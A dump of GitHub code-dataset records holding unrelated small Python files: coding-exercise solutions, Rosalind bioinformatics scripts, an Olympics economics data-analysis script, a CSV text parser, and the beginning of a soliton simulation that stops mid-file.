집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n 첫번째 집을 파란색으로 칠하고 마지막 집을 [빨간색, 초록색, 파란색] 으로 칠하는 비용\r\n]\r\n중 에서 첫번째 집과 마지막 집을 같은 색깔로 칠하는 경우를 제외한 경우 중의 최소값이 된다.\r\n'''\r\n\r\nprint(min(dp[N-1][0][1], dp[N-1][0][2], dp[N-1][1][0], dp[N-1][1][2], dp[N-1][2][0], dp[N-1][2][1]))","repo_name":"kaeng2/TIL","sub_path":"백준/Gold/17404. RGB거리 2/RGB거리 2.py","file_name":"RGB거리 2.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"39287179237","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 22 20:38:50 2015\n\n@author: Anton Kulesh\n\"\"\"\n\nimport csv\nimport re\n#Данная функция принимает на входе список (listOfdata=результат работы парсера) \"утверждений\", обрабатывает каждое \n#из них по определенному шаблону и записывает результат в файл \"Collection.csv\" (создание коллекции)\n\ndef collection(listOfdata,filename=\"Collection.csv\"):\n csvfile=open(filename, 'w')\n fieldnames = ['Type', 'Name','Keywords','Description']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for i in range(0,len(listOfdata)):\n if listOfdata[i][0]=='T':\n patt_theorem=r'Theorem\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)\\.?|Theorem\\s[0-9]+\\.[0-9]?\\.?'\n name_theorem=re.findall(patt_theorem,listOfdata[i])\n disc_theorem=[listOfdata[i].replace(name_theorem[0],\"\")]\n if '(' in name_theorem[0]:\n name_theorem=re.findall(r'\\((.*?)\\)',name_theorem[0]) \n p_theorem=r'\\)\\.?\\s?(.*?)\\.$'\n disc_theorem=re.findall(p_theorem,listOfdata[i])\n writer.writerow({'Type': 'Theorem', 'Name': name_theorem[0],'Keywords':'None','Description':disc_theorem[0]})\n elif listOfdata[i][0]=='D':\n patt_def=r'Definition\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)|Definition\\s[0-9]+\\.[0-9]?\\.?'\n name_def=re.findall(patt_def,listOfdata[i])\n disc_def=[listOfdata[i].replace(name_def[0],\"\")]\n if '(' in name_def[0]:\n name_def=re.findall(r'\\((.*?)\\)',name_def[0]) \n p_def='\\)\\.?\\s?(.*?)\\.$'\n disc_def=re.findall(p_def,listOfdata[i])\n writer.writerow({'Type': 'Definition', 'Name': name_def[0],'Keywords':'None','Description':disc_def[0]})\n elif listOfdata[i][0]=='L':\n patt_lemma=r'Lemma\\s[0-9]+\\.[0-9]*\\.?\\s\\([a-zA-Z\\s\\,\\-]*\\)|Lemma\\s[0-9]+\\.[0-9]?\\.?'\n name_lemma=re.findall(patt_lemma,listOfdata[i])\n disc_lemma=[listOfdata[i].replace(name_lemma[0],\"\")]\n if '(' in name_lemma[0]:\n name_lemma=re.findall(r'\\((.*?)\\)',name_lemma[0]) \n p_lemma='\\)\\.?\\s?(.*?)\\.$'\n disc_lemma=re.findall(p_lemma,listOfdata[i])\n writer.writerow({'Type': 'Lemma', 'Name': name_lemma[0],'Keywords':'None','Description':disc_lemma[0]})\n \n ","repo_name":"laputski/km-math-ontology","sub_path":"TextMining/create_collection.py","file_name":"create_collection.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"11112270001","text":"# %%\nimport os\n\n#rosalind_dir = '/media/pulpo/SD/python/Rosalind/Bioinf/'\nrosalind_dir = 'X:/bioinf/scriptsPy/Rosalind/6-10/'\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 6 Contador de mismatch -----\n# =============================================================================\n\ntext_file_hamm = 'rosalind_hamm.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_hamm)\n\nDNA = (open(full_directory_2, \"r\")).read().split('\\n')\n\nmismatch_cnt = 0\n\n\ndna1 = DNA[0]\ndna2 = DNA[1]\n\nfor i, n in enumerate(dna1):\n if n != dna2[i]: mismatch_cnt += 1\n\n\n# %% \n# =============================================================================\n# ----- ejercicio 7 primera ley mendel -----\n# =============================================================================\n\n#A son homocigota dominante, B heterocigota, C homocigota recesivo\na, b, c = 2,2,2\n\ntotal = a+b+c\n\n\n#Se forman 6 ecuaciones diferentes (AA*AA, AA*Aa, AA* aa, Aa*Aa, Aa*aa, aa*aa)\n#simplifcando llegamos a esta ecuacion\npercentage = ((a*((a-1) + 2*(b+c))) + (0.75*b*(b-1)) + (b*c)) / (total*(total-1))\n#\n\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 8 RNa a proteina -----\n# =============================================================================\nimport re\n\ntext_file_hamm = 'rosalind_prot.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_hamm)\n\n\ncodones = {\n 'UUU': 'F', 'CUU': 'L', 'AUU': 'I', 'GUU': 'V',\n 'UUC': 'F', 'CUC': 'L', 'AUC': 'I', 'GUC': 'V',\n 'UUA': 'L', 'CUA': 'L', 'AUA': 'I', 'GUA': 'V',\n 'UUG': 'L', 'CUG': 'L', 'AUG': 'M', 'GUG': 'V',\n 'UCU': 'S', 'CCU': 'P', 'ACU': 'T', 'GCU': 'A',\n 'UCC': 'S', 'CCC': 'P', 'ACC': 'T', 'GCC': 'A',\n 'UCA': 'S', 'CCA': 'P', 'ACA': 'T', 'GCA': 'A',\n 'UCG': 'S', 'CCG': 'P', 'ACG': 'T', 'GCG': 'A',\n 'UAU': 'Y', 'CAU': 'H', 'AAU': 'N', 'GAU': 'D',\n 'UAC': 'Y', 'CAC': 'H', 'AAC': 'N', 'GAC': 'D',\n 'UAA': 'Stop', 'CAA': 'Q', 'AAA': 'K', 'GAA': 'E',\n 'UAG': 'Stop', 'CAG': 'Q', 'AAG': 'K', 'GAG': 'E',\n 'UGU': 'C', 'CGU': 'R', 'AGU': 'S', 'GGU': 'G',\n 'UGC': 'C', 'CGC': 'R', 'AGC': 'S', 'GGC': 'G',\n 'UGA': 'Stop', 'CGA': 'R', 'AGA': 'R', 'GGA': 'G',\n 'UGG': 'W', 'CGG': 'R', 'AGG': 'R', 'GGG': 'G'\n}\n\n\nRNA = (open(full_directory_2, \"r\")).read()\nRNA_codons = re.findall('...', RNA)\nproteina = ''\n\n\nfor codon in RNA_codons:\n if codones.get(codon) == 'Stop': break\n proteina += codones.get(codon)\n \n \n \n# %%\n# =============================================================================\n# ----- ejercicio 9 Finding mottifs in DNA -----\n# ============================================================================= \ntext_file_subs = 'rosalind_subs.txt'\nfull_directory_2 = os.path.join(rosalind_dir, text_file_subs)\n\nsequences = (open(full_directory_2, \"r\")).read().split('\\n')\n\n\nDNA = sequences[0]\nmottifs = sequences[1] \n\nmottifs_len = len(mottifs)\n\npos = ''\nfor i, n in enumerate(DNA):\n if(DNA[i:i+mottifs_len] != mottifs): continue\n else: pos += str(i+1) + ' '\n \n \nprint (pos)\n\n\n\n\n# %%\n# =============================================================================\n# ----- ejercicio 10 making a consensus -----\n# =============================================================================\n\ntext_file_hamm = 'rosalind_cons.txt'\nfull_directory = os.path.join(rosalind_dir, text_file_hamm)\n\nfh = (open(full_directory))\n\n\n\nsequences = [] \ntemp_line = ''\nfor lines in fh:\n if (lines.startswith('>') is False):\n temp_line += lines.rstrip()\n if (temp_line != '' and lines.startswith('>')):\n sequences.append(temp_line)\n temp_line = ''\nsequences.append(temp_line)\ndel temp_line\n\nlen_seq = len(sequences[0])\n\nprofile = {\n 'A': [],\n 'C': [],\n 'G': [],\n 'T': []\n}\n\n\nfor n in range(len_seq): \n profile['A'].append(0)\n profile['C'].append(0)\n profile['G'].append(0)\n profile['T'].append(0)\n\n\n\nfor seq in sequences:\n for i, nit_base in enumerate(seq):\n profile[nit_base][i] += 1\n\n\n\ndef return_nit_bas(bases):\n bases.sort(key = lambda x: x[0], reverse = True)\n print (bases)\n return bases[0][1]\n\n\n\nconsensus = ''\nfor i in range(len_seq):\n consensus += return_nit_bas([[profile['A'][i], 'A'], [profile['C'][i], 'C'],\n [profile['G'][i], 'G'], [profile['T'][i], 'T']])\n\n\nprint(consensus)\n\nfor k, v in profile.items():\n print(k, end = ': ')\n for i in range(len_seq):\n print(profile[k][i], end = ' ')\n print('\\n')\n ","repo_name":"mauroRey/bioinfpy","sub_path":"Rosalind/06-10/6-10.py","file_name":"6-10.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"14488693410","text":"from datetime import date\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\nimport re\nimport os\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nsns.set_theme(style=\"darkgrid\")\nsns.set(rc={'figure.figsize': (16, 8)})\n\n# Olympic games related data set\nsummer_olympics_data = pd.read_csv(\"Datasets/summer.csv\")\nwinter_olympics_data = pd.read_csv(\"Datasets/winter.csv\")\n\n# Olympics costs related data set\nolympics_costs = pd.read_csv(\"Datasets/olympicscosts.csv\")\ncost_revenue = pd.read_csv(\"Datasets/cost_revenue.csv\")\nbroadcast_revenue = pd.read_csv('Datasets/broadcastrevenue.csv')\n\n# Country related data set\ncountry_codes = pd.read_csv('Datasets/countries.csv')\nmedal_data = pd.read_csv('Datasets/medals.csv')\n\n# Olympics Bid Datasets\nwinter_bid_year_df = pd.read_csv('Datasets/winterbidbyyear.csv')\nwinter_bid_country_df = pd.read_csv('Datasets/winterbidbycountry.csv')\nsummer_bid_country_df = pd.read_csv('Datasets/summerbidbycountry.csv')\nsummer_bid_year_df = pd.read_csv('Datasets/summerbidbyyear.csv')\n\n# Save the EDA results in this directory\nresults_dir = './results/'\nif not os.path.exists(results_dir):\n os.mkdir(results_dir)\n\n# Economic Indicators Data\neconomic_variables = {'NY.GDP.MKTP.CD': 'GDP', 'ST.INT.ARVL': 'Tourism Arrival', 'NY.GDP.DEFL.KD.ZG': 'Inflation',\n 'PA.NUS.FCRF': 'Exchange Rate', 'GC.DOD.TOTL.GD.ZS': 'Debt', 'NY.GDP.MKTP.KD.ZG': 'GDP Growth',\n 'NE.TRD.GNFS.ZS': 'Trade', 'NE.IMP.GNFS.ZS': 'Import Goods', 'GC.TAX.TOTL.GD.ZS': 'Tax Revenue',\n 'CM.MKT.TRAD.GD.ZS': 'Stocks', 'BX.KLT.DINV.WD.GD.ZS': 'Foreign Investments',\n 'NE.DAB.TOTL.ZS': 'Gross National Expenditure', 'GC.REV.XGRT.GD.ZS': 'Revenue',\n 'SL.IND.EMPL.ZS': 'Employment', 'SL.UEM.TOTL.NE.ZS': 'Unemployment'}\n\n# Map to fix the country code mismatch\nalias_names = {'GER': 'DEU', 'FRG': 'DEU', 'NED': 'NLD', 'SUI': 'CHE', 'YUG': 'SRB', 'URS': 'RUS', 'GRE': 'GRC'}\n\n# List of Column names\ndrop_cols = ['Unnamed: 0', 'edition_code', 'edition']\ncol_name = [\"Cost, Billion USD\", \"Cost Overrun %\", \"Country\"]\nyear_list = [i for i in range(1960, 2021)]\n\n# Dropping Unnecessary columns\ncountry_codes.drop(columns=drop_cols[0], inplace=True)\nsummer_olympics_data.drop(drop_cols, axis=1, inplace=True)\nwinter_olympics_data.drop(drop_cols, axis=1, inplace=True)\n\n# Dropping olympic games(rows) that were not conducted\nwinter_olympics_data.dropna(inplace=True)\nsummer_olympics_data.dropna(inplace=True)\n\n# Replacing country code mismatch\nsummer_olympics_data = summer_olympics_data.replace(alias_names)\nwinter_olympics_data = winter_olympics_data.replace(alias_names)\ncountry_codes = country_codes.replace(alias_names)\n\nsummer_olympics_data = summer_olympics_data.merge(country_codes, on='country_code').drop_duplicates(\n subset=['country_code', 'year'])\nwinter_olympics_data = winter_olympics_data.merge(country_codes, on='country_code').drop_duplicates(\n subset=['country_code', 'year'])\n\n# Number of times each countries hosted the olympics\nsummer_count = summer_olympics_data.groupby(['country_name'])['year'].count()\nwinter_count = winter_olympics_data.groupby(['country_name'])['year'].count()\n\n\n# Summer Olympics\ndef freq_plot(data, text):\n plot_one = sns.barplot(x=data.index, y=data.values)\n plot_one.set_xticklabels(plot_one.get_xticklabels(), rotation=90)\n plot_one.set_title(text + ' Olympics held by Countries')\n plot_one.set_xlabel('Country')\n plot_one.set_ylabel('Count')\n plt.show()\n freq_fig = plot_one.get_figure()\n freq_fig.savefig(results_dir + text + '-' + 'count.png')\n\n\nfreq_plot(summer_count, 'Summer')\nfreq_plot(winter_count, 'Winter')\n\nsummer_hosts = winter_olympics_data['country_code'].unique()\nwinter_hosts = summer_olympics_data['country_code'].unique()\n\ndistinct_countries = [*summer_hosts, *winter_hosts]\ncountries_set = set(distinct_countries)\n\nprint(\"\\nNumber of Countries hosted Olympics: \", len(countries_set))\n\nolympics_costs[col_name[0]] = olympics_costs[col_name[0]].astype(float).fillna(olympics_costs[col_name[0]].median())\nexpensive_olympics = olympics_costs.sort_values(col_name[0], ascending=False).nlargest(10, col_name[0])\n\nplot_two = sns.barplot(x=col_name[0], y=col_name[2], data=expensive_olympics, ci=None)\nplot_two.set_title('Expensive Olympic games in both seasons')\nexpensive_games = plot_two.get_figure()\nexpensive_games.savefig(results_dir + 'expensive-games.png')\n\nplot_three = sns.lineplot(data=olympics_costs, x=\"Year\", y=col_name[0], hue=\"Type\", marker='o')\nplot_three.set_title('Cost of Olympic games over the years')\ncost_time_series = plot_three.get_figure()\ncost_time_series.savefig(results_dir + 'cost-over-years.png')\n\nsummer_games = olympics_costs[olympics_costs['Type'] == 'Summer']\nwinter_games = olympics_costs[olympics_costs['Type'] == 'Winter']\n\nexpensive_summer = summer_games[summer_games[col_name[0]] == summer_games[col_name[0]].max()]\nexpensive_winter = winter_games[winter_games[col_name[0]] == winter_games[col_name[0]].max()]\n\nprint(\"\\nMost Expensive Summer Olympic game : {}, Cost in Billions : {}\".format(expensive_summer['Games'].iloc[0], \\\n expensive_summer[col_name[0]].iloc[0]))\nprint(\"\\nMost Expensive Winter Olympic game : {}, Cost in Billions : {}\".format(expensive_winter['Games'].iloc[0], \\\n expensive_winter[col_name[0]].iloc[0]))\n\nplot_four = sns.boxplot(x='Type', y=col_name[0], data=olympics_costs, showmeans=True,\n meanprops={\"marker\": \"o\",\n \"markerfacecolor\": \"Red\",\n \"markeredgecolor\": \"Red\",\n \"markersize\": \"10\"})\nplot_four.set_title('Cost comparision of Olympic games')\nplt.show()\n\ncost_comparsion = plot_four.get_figure()\ncost_comparsion.savefig(results_dir + 'cost-comparision.png')\n\nsel_cols = ['City', 'Game', 'Year', 'Revenue', 'ProfitorLoss', 'Cost']\n\n# Data Preprocessing\nclean_data = cost_revenue.dropna()\n\nclean_data[sel_cols[3]] = clean_data[sel_cols[3]].str.replace(\",\", \"\")\nclean_data[sel_cols[4]] = clean_data[sel_cols[4]].str.replace(\",\", \"\")\nclean_data[sel_cols[5]] = clean_data[sel_cols[5]].str.replace(\",\", \"\")\n\nconvert_dict = {sel_cols[3]: 'int64', sel_cols[4]: 'int64', sel_cols[5]: 'int64'}\nclean_data = clean_data.astype(convert_dict)\n\nclean_data[sel_cols[4]] = clean_data[sel_cols[3]] - clean_data[sel_cols[5]]\nclean_data[sel_cols[3:6]] = clean_data[sel_cols[3:6]] / 10 ** 9\n\n# Plotting the data\nsummer_revenue_data = clean_data[clean_data['Game'] == 'Summer'][sel_cols]\nwinter_revenue_data = clean_data[clean_data['Game'] == 'Winter'][sel_cols]\n\n\ndef plot_chart(df, cols, text):\n df.plot(x=cols[0], y=cols[1:], kind=\"line\", marker='o')\n plt.xlabel(\"Year\")\n plt.ylabel(\"Cost in Billions\")\n plt.title(text + \" Olympic Game Revenue vs Profit/Loss\")\n plt.savefig(results_dir + text + '-profit-loss.png')\n plt.show()\n\n\nplot_chart(summer_revenue_data, sel_cols[2:5], 'Summer')\nplot_chart(winter_revenue_data, sel_cols[2:5], 'Winter')\n\n# Data Preprocessing\nreplace_values = {\"K\": \"000\", \"M\": \"000000\", \"B\": \"000000000\"}\nbroadcast_revenue['Broadcast Revenue'] = broadcast_revenue['Broadcast Revenue'].replace(replace_values, regex=True)\n\n\ndef convert_string(value):\n value = str(value).replace('$', \"\")\n substr = \".\"\n if substr in value:\n value = value.replace(substr, \"\").replace(\"0\", \"\", 1)\n return int(value) / 10 ** 9\n\n\nbroadcast_revenue['Broadcast Revenue'] = broadcast_revenue['Broadcast Revenue'].apply(convert_string)\nsel_cols = ['Year', 'Broadcast Revenue']\n\n# Analysis and plotting\nsummer_filtered = broadcast_revenue[broadcast_revenue['Game Type'] == 'Summer'][sel_cols]\nwinter_filtered = broadcast_revenue[broadcast_revenue['Game Type'] == 'Winter'][sel_cols]\n\nfig, (ax1, ax2) = plt.subplots(1, 2)\n\n\ndef plot_revenue_chart(df, cols, ax, text):\n ax.set_title(text + ' games broadcast revenue over the years')\n ax.stem(df[cols[0]], df[cols[1]])\n ax.set_xlabel('Years')\n ax.set_ylabel('Cost in Billions')\n fig.show()\n\n\nplot_revenue_chart(summer_filtered, sel_cols, ax1, 'Summer')\nplot_revenue_chart(winter_filtered, sel_cols, ax2, 'Winter')\nfig.savefig(results_dir + 'broadcast-revenue.png')\n\n\ndef plot_bid_countries(df, text):\n df.groupby(['Bid_Year'])['Bid_Country'].nunique().plot(kind='bar', xlabel='Bid Year',\n ylabel='Count',\n figsize=(15, 5),\n title='Number of Bidding Countries over the years for hosting ' + text + ' Olympics')\n plt.savefig(results_dir + text + '-bidcount.png')\n plt.show()\n\n\nplot_bid_countries(summer_bid_year_df, 'Summer')\nplot_bid_countries(winter_bid_year_df, 'Winter')\n\nfig, (ax1, ax2) = plt.subplots(1, 2)\n\n\ndef plot_donut(df, axis, text):\n df.groupby(['Bid_Country'])['Bid_Year'].nunique().nlargest(15, keep='first').plot(kind='pie',\n ax=axis,\n y='Bid_Year',\n ylabel=\"\",\n subplots=True,\n figsize=(10, 10),\n autopct='%1.0f%%')\n axis.add_patch(plt.Circle((0, 0), 0.7, color='white'))\n axis.set_title('Country participation in ' + text + ' Bidding process for all the years.')\n\n\nplot_donut(summer_bid_year_df, ax1, 'Summer')\nplot_donut(winter_bid_year_df, ax2, 'Winter')\nfig.savefig(results_dir + 'country-participation.png')\nfig.show()\n\nfig, axes = plt.subplots(1, 2)\n\n\n# Data Preprocessing\ndef evaluate(strinput):\n data = literal_eval(str(strinput))\n return data\n\n\ndef flatten_inputs(inputlist):\n flat_list = [listitem for sublist in inputlist for listitem in sublist]\n return flat_list\n\n\ndef process_df(df):\n cols = df.columns\n for colindex in cols[2:]:\n df[colindex] = df[colindex].apply(evaluate)\n flatten_df = df.groupby(cols[0])[cols[2:]].agg(flatten_inputs)\n for col in cols[2:]:\n flatten_df[col] = flatten_df[col].apply(lambda x: len(x))\n return flatten_df\n\n\n# Plotting Data\ndef plot_data(inputdf, axis, text):\n axes[axis].bar(inputdf.index, inputdf['Failed_Bids'], color='r', label='Failed')\n axes[axis].bar(inputdf.index, inputdf['Success_Bids'], color='b', bottom=inputdf['Failed_Bids'], label='Success')\n axes[axis].set_ylabel('Count')\n axes[axis].set_xlabel('Country')\n axes[axis].set_title(text + ' - Failed and Success')\n axes[axis].set_xticklabels(inputdf.index, rotation=90)\n axes[axis].legend()\n fig.show()\n\n\nplot_data(process_df(summer_bid_country_df), 0, 'Summer')\nplot_data(process_df(winter_bid_country_df), 1, 'Winter')\nfig.savefig(results_dir + 'bidding-outcomes.png')\n\ns_count = summer_olympics_data.groupby(['country_code'])['year'].count()\nw_count = winter_olympics_data.groupby(['country_name'])['year'].count()\ntotal_olympics_count = pd.merge(s_count, w_count, how='outer', right_index=True, left_index=True).fillna(0).astype(int)\n\ntotal_olympics_count = total_olympics_count.rename({\"year_x\": \"summer_count\", \"year_y\": \"winter_count\"}, axis='columns')\ntotal_olympics_count['total'] = total_olympics_count['summer_count'] + total_olympics_count['winter_count']\ntotal_olympics_count['Country_Name'] = total_olympics_count.index.map(\n lambda x: country_codes[country_codes['country_code'] == x]['country_name'])\ntotal_olympics_count.rename(index=alias_names, inplace=True)\n\nfig = px.choropleth(total_olympics_count, locations=total_olympics_count.index,\n color=\"total\",\n hover_name=\"Country_Name\",\n color_continuous_scale=px.colors.sequential.Plasma)\nfig.update_layout(\n autosize=True,\n width=900,\n height=500,\n title_text='Total Number of Olympics conducted by each country over all the years',\n)\nfig.write_html(results_dir + \"olympics-geography.html\")\nfig.show()\n\nfig, axes = plt.subplots(1, 2)\n\nnew_cols = ['Cost per event, Millions', 'Cost per athlete, Millions']\n\nolympics_costs[new_cols[0]] = (olympics_costs[col_name[0]] * 1000) / olympics_costs['Events']\nolympics_costs[new_cols[1]] = (olympics_costs[col_name[0]] * 1000) / olympics_costs['Athletes']\n\n\ndef plot_chart(inputdf, axis, text, col_name):\n sns.lineplot(data=inputdf, x=\"Year\", y=col_name, hue=\"Type\", marker='o', ax=axes[axis])\n axes[axis].set_ylabel(col_name)\n axes[axis].set_xlabel('Year')\n axes[axis].set_title(text)\n axes[axis].legend()\n fig.show()\n\n\nplot_chart(olympics_costs, 0, 'Time Series - Cost per Event', new_cols[0])\nplot_chart(olympics_costs, 1, 'Time Series - Cost per Athlete', new_cols[1])\n\ncost_overrun_df = olympics_costs.dropna(subset=[col_name[1]])\nfig = px.scatter(cost_overrun_df, x=\"Games\", y=\"Year\", size=col_name[1],\n hover_name=col_name[1], size_max=60, title='Cost Overrun(%) in Olympic games for different years.')\nfig.show()\n\nmedal_data = medal_data.replace(alias_names)\nfiltered_data = medal_data[medal_data['country_code'].isin(countries_set)] \\\n .drop_duplicates(subset=['country_code']).nlargest(10, 'total')\nfig = px.bar_polar(filtered_data, r=\"total\",\n theta='country', color='total',\n title='Top 10 olympic host countries in total medal count for all the years.')\nfig.show()\n\nsummer_host_info = summer_olympics_data.groupby('country_code')['year'].apply(list).reset_index().explode('year')\nwinter_host_info = winter_olympics_data.groupby('country_code')['year'].apply(list).reset_index().explode('year')\n\nsummer_host_info = summer_host_info[(summer_host_info['year'] >= 1964) & (summer_host_info['year'] <= 2016)]\nwinter_host_info = winter_host_info[(winter_host_info['year'] >= 1964) & (winter_host_info['year'] <= 2016)]\n\n\n# Helper Methods\ndef plot_indicator_change(df, title, game_type):\n x_value = df['Country'] + \"-\" + df['Year'].astype(str)\n fig = go.Figure(data=[\n go.Bar(name='Before', x=x_value, y=df['Before'].values),\n go.Bar(name='After', x=x_value, y=df['After'].values),\n ])\n fig.update_layout(barmode='group', width=900, height=500,\n title_text='Change in {} value - Before and after hosting - {} Olympics'.format(title, game_type))\n fig.show()\n\n\n# Main logic\ndef process_economic_variables(inputdf, gtype):\n cols = ['Year', 'Country', 'Before', 'After']\n\n for key, value in economic_variables.items():\n eco_df = wb.data.DataFrame(key)\n eco_df = eco_df.rename(columns=lambda x: int(x.replace('YR', '')))\n eco_df = eco_df[year_list]\n eco_df = eco_df.transpose().fillna(method='backfill').fillna(method='ffill').transpose()\n\n change_df = pd.DataFrame(columns=cols)\n row_data = {cols[0]: None, cols[1]: None, cols[2]: None, cols[3]: None}\n\n for row in inputdf.itertuples(index=False):\n row_data[cols[0]] = row.year\n row_data[cols[1]] = row.country_code\n row_data[cols[2]] = eco_df.loc[row.country_code, [i for i in range(row.year - 4, row.year)]].mean()\n row_data[cols[3]] = eco_df.loc[row.country_code, [i for i in range(row.year, row.year + 5)]].mean()\n change_df = change_df.append(row_data, ignore_index=True)\n\n change_df.dropna(inplace=True)\n plot_indicator_change(change_df, value, gtype)\n\n\nprocess_economic_variables(summer_host_info, 'Summer')\nprocess_economic_variables(winter_host_info, 'Winter')\n","repo_name":"srakhe/olympics","sub_path":"scripts/olympic_analysis/eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":16076,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"41092527134","text":"\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n# 4 -> 2 -> 3\n\n# 2 -> 3\n\n# rev_item = (4,)\n# next_item = (2, )\n# next_item = (2, (4,))\n# l=3\n# rev_item = (2, (4, ))\n# \n\n# 4\n# 2 -> 4\nclass Solution:\n \n def addTwoNumbers(self, l1: ListNode, l2: ListNode):\n node_1 = ListNode((l1.val + l2.val) % 10)\n first_node = node_1\n overflow = (l1.val + l2.val) > 9\n l1 = l1.next\n l2 = l2.next\n \n while True:\n aux_node = ListNode()\n if l1 and l2:\n aux_node.val = (l1.val + l2.val + overflow) % 10\n overflow = (l1.val + l2.val + overflow) > 9\n l1 = l1.next\n l2 = l2.next\n node_1.next = aux_node\n node_1 = aux_node\n elif l1:\n aux_node.val = (l1.val + overflow) % 10\n overflow = (l1.val + overflow) > 9\n l1 = l1.next\n node_1.next = aux_node\n node_1 = aux_node\n elif l2:\n aux_node.val = (l2.val + overflow) % 10\n overflow = (l2.val + overflow ) > 9\n l2 = l2.next\n node_1.next = aux_node\n node_1 = aux_node\n else:\n break\n \n\n if overflow:\n node_1.next = ListNode(1,None)\n\n return first_node\n \ns=Solution()\n\nl1 = ListNode(3, ListNode(7))\nl2 = ListNode(9, ListNode(2))\n\na = s.addTwoNumbers(l1,l2)\nprint(a.val)\nwhile a.next:\n a = a.next\n print(a.val)","repo_name":"CookiezLIT/leetCodeProblems","sub_path":"beginner/add_two_numbers.py","file_name":"add_two_numbers.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24316847820","text":"from fb_post_v2.interactors.storages import ReactionStorageInterface\n\nfrom fb_post_v2.interactors.presenters import PresenterInterface\n\nfrom typing import List, Optional\n\n\nclass GetPostsReactedByUserInteractor:\n\n def __init__(self, reaction_storage: ReactionStorageInterface,\n presenter: PresenterInterface):\n\n self.reaction_storage = reaction_storage\n self.presenter = presenter\n\n def get_posts_reacted_by_user(self, user_id: int) ->List[Optional[int]]:\n\n post_ids_list = self.reaction_storage.get_posts_reacted_by_user(\n user_id=user_id)\n response = self.presenter.get_posts_reacted_by_user_response(\n post_ids_list=post_ids_list\n )\n return response","repo_name":"R151865/fb_post_learning","sub_path":"fb_post_v2/interactors/get_posts_reacted_by_user_interactor.py","file_name":"get_posts_reacted_by_user_interactor.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"8684445435","text":"import circle as c\nimport numpy as np\n\n\ndef main():\n r=float(input(\"반지름을 입력하세요: \"))\n area=c.area(r)\n print(f'넓이: {area}')\n\n ci=c.ci_circle(r)\n print(f'둘레: {ci}')\n\nmain()\n\nresult = np.random.rand(10)\nprint(result)\n","repo_name":"minsu0917/java_python","sub_path":"python_work/220708/ex03.py","file_name":"ex03.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73363774525","text":"\nVALID_RANGE = range(10) + range(10, 101, 10) + [1000] \nEXTENTION = \".wav\"\nAudioDirectory = \"sounds/\"\nAudioLoaded = False\n\nimport wave\nimport pygame\n\n'''\nclass Node(object):\n _fields = []\n def __init__( self, *args ):\n for (attr, value) in zip( self.__class__._fields, args ):\n setattr(self, attr, value)\n'''\n\nclass compositeObj:\n def __init__( self, the_file, fname ):\n self.the_file = the_file\n self.fname = fname\n\n\n\ndic = { number : compositeObj(wave.open(AudioDirectory + wave_name), wave_name) \n for (number, wave_name) in zip(VALID_RANGE, \n map(lambda x: str(x) + EXTENTION, VALID_RANGE)) }\n\ndic.update( { \"et\" : \"et.wav\" } )\n\n#XXX: Maybe it is a bad idea, probably i'm gonna find a more consice way of it\n\n\n\ndef is_valid( number ):\n return number in dic.keys()\n\ndef _prepare( number ):\n if is_valid( number ):\n return [ number ]\n\n sv = str(number)\n size = len(sv) - 1\n q = int(sv[0])\n return [ q * ( 10 ** size ) ] + _prepare(int(sv[1:])) \n\ndef regularize_me(item):\n size, sn = len(str(item)), str(item)\n if size in [4, 3]:\n return ( [\"1000.wav\", \"100.wav\"][size == 3], sn[0] + EXTENTION )\n return sn + EXTENTION\n \n\ndef play(sound_file):\n sound_file = AudioDirectory + sound_file\n pygame.init()\n song = pygame.mixer.Sound(sound_file)\n clock = pygame.time.Clock()\n song.play()\n i = 80\n while i > 0:\n clock.tick(60)\n i -= 1\n pygame.quit()\n\n\n","repo_name":"alhasapi/FULFULDE-CALC","sub_path":"sound_manger.py","file_name":"sound_manger.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"27830388632","text":"print(\"Python version 3.6.4\")\n\n# Project 3: Dynamics of Solitons\n\nimport math\n\nprint(\"Math version for python 3.6.4\")\n\nimport numpy as np\n\nprint(\"Numpy version: \" + str(np.__version__))\n\nimport matplotlib.pyplot as plt\n\nimport matplotlib.axes as ax\n\nimport matplotlib.animation as animation\n\nfrom matplotlib.colors import LogNorm\n\nfrom math import log10, floor\n\nprint(\"matplotlib version for python 3.6.4\")\n\n# a) program to propagate the pulse using Runge Kutta 4th order discretisation\n\n# Parameters of the problem\n\nalpha = 9.0\n\ndx = 0.15\n\ndt = dx**3\n\nx = np.arange(0,40,dx)\n\n#conditions for different results-----------------------------------------------------------------\n\nwavebreak = False\n\nplotcmap = False\n\nplotcmapcol = False\n\nplotsoliton = False\n\nanimate = False\n\nvelplot = False\n\nstabilityplot = False\n\nplotcmapwb = 